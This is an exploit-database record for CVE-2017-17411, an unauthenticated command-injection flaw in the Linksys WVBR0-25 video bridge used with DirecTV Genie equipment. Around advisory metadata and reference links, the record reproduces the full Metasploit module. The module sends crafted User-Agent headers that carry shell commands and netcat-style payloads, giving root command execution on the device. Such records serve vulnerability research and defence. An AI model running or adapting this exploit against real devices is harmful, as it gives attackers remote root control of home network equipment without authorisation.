ID
VAR-E-201712-0126
CVE
| cve_id: | CVE-2017-17411 | Trust: 1.8 |
EDB ID
43429
TITLE
Linksys WVBR0-25 - User-Agent Command Execution (Metasploit) - Hardware remote Exploit
Trust: 0.6
DESCRIPTION
Linksys WVBR0-25 - User-Agent Command Execution (Metasploit). CVE-2017-17411 . remote exploit for Hardware platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | linksys | model: | wvbr0-25 | scope: | - | version: | - | Trust: 1.6 |
| vendor: | linksys | model: | wvbr0-25 user-agent | scope: | - | version: | - | Trust: 0.5 |
| vendor: | linksys | model: | wvbr0 | scope: | eq | version: | 25 | Trust: 0.3 |
EXPLOIT
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Linksys WVBR0-25 User-Agent Command Execution',
'Description' => %q{
The Linksys WVBR0-25 Wireless Video Bridge, used by DirecTV to connect wireless Genie
cable boxes to the Genie DVR, is vulnerable to OS command injection in version < 1.0.41
of the web management portal via the User-Agent header. Authentication is not required to
exploit this vulnerability.
},
'Author' =>
[
'HeadlessZeke' # Vulnerability discovery and Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['CVE', '2017-17411'],
['ZDI', '17-973'],
['URL', 'https://www.thezdi.com/blog/2017/12/13/remote-root-in-directvs-wireless-video-bridge-a-tale-of-rage-and-despair']
],
'DisclosureDate' => 'Dec 13 2017',
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 1024,
'Compat' =>
{
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat'
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DefaultTarget' => 0
))
end
def check
check_str = rand_text_alpha(8)
begin
res = send_request_raw({
'method' => 'GET',
'uri' => '/',
'agent' => "\"; printf \"#{check_str}"
})
if res && res.code == 200 && res.body.to_s.include?(Rex::Text.md5(check_str))
return Exploit::CheckCode::Vulnerable
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Unknown
end
Exploit::CheckCode::Safe
end
def exploit
print_status("#{peer} - Trying to access the device ...")
unless check == Exploit::CheckCode::Vulnerable
fail_with(Failure::NotVulnerable, "#{peer} - Failed to access the vulnerable device")
end
print_status("#{peer} - Exploiting...")
if datastore['PAYLOAD'] == 'cmd/unix/generic'
exploit_cmd
else
exploit_session
end
end
def exploit_cmd
beg_boundary = rand_text_alpha(8)
begin
res = send_request_raw({
'method' => 'GET',
'uri' => '/',
'agent' => "\"; echo #{beg_boundary}; #{payload.encoded} #"
})
if res && res.code == 200 && res.body.to_s =~ /#{beg_boundary}/
print_good("#{peer} - Command sent successfully")
if res.body.to_s =~ /ret :.+?#{beg_boundary}(.*)/ # all output ends up on one line
print_status("#{peer} - Command output: #{$1}")
end
else
fail_with(Failure::UnexpectedReply, "#{peer} - Command execution failed")
end
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
def exploit_session
begin
send_request_raw({
'method' => 'GET',
'uri' => '/',
'agent' => "\"; #{payload.encoded} #"
})
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end
Trust: 1.0
EXPLOIT LANGUAGE
rb
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
User-Agent Command Execution (Metasploit)
Trust: 1.6
TAGS
| tag: | Metasploit Framework (MSF) | Trust: 1.0 |
| tag: | exploit | Trust: 0.5 |
| tag: | web | Trust: 0.5 |
CREDITS
Metasploit
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2017-17411 | Trust: 1.8 |
| db: | EXPLOIT-DB | id: | 43429 | Trust: 1.6 |
| db: | EDBNET | id: | 95715 | Trust: 0.6 |
| db: | PACKETSTORM | id: | 145640 | Trust: 0.5 |
| db: | ZDI | id: | ZDI-17-973 | Trust: 0.3 |
| db: | BID | id: | 102212 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2017-17411 | Trust: 1.5 |
| url: | https://raw.githubusercontent.com/rapid7/metasploit-framework/c3f10c1d57f614d10035028a3343458a6e5011b9/modules/exploits/linux/http/linksys_wvbr0_user_agent_exec_noauth.rb | Trust: 1.0 |
| url: | https://www.exploit-db.com/exploits/43429/ | Trust: 0.6 |
| url: | http://www.zerodayinitiative.com/advisories/zdi-17-973/ | Trust: 0.3 |
| url: | https://www.linksys.com | Trust: 0.3 |
| url: | https://github.com/nixawk/labs/blob/master/cve-2017-17411/exploit-cve-2017-17411.py | Trust: 0.3 |
| url: | https://github.com/rapid7/metasploit-framework/issues/9304 | Trust: 0.3 |
SOURCES
| db: | BID | id: | 102212 |
| db: | PACKETSTORM | id: | 145640 |
| db: | EXPLOIT-DB | id: | 43429 |
| db: | EDBNET | id: | 95715 |
LAST UPDATE DATE
2022-07-27T09:58:23.550000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 102212 | date: | 2017-12-19T21:01:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 102212 | date: | 2017-12-18T00:00:00 |
| db: | PACKETSTORM | id: | 145640 | date: | 2018-01-04T01:01:48 |
| db: | EXPLOIT-DB | id: | 43429 | date: | 2018-01-04T00:00:00 |
| db: | EDBNET | id: | 95715 | date: | 2018-01-04T00:00:00 |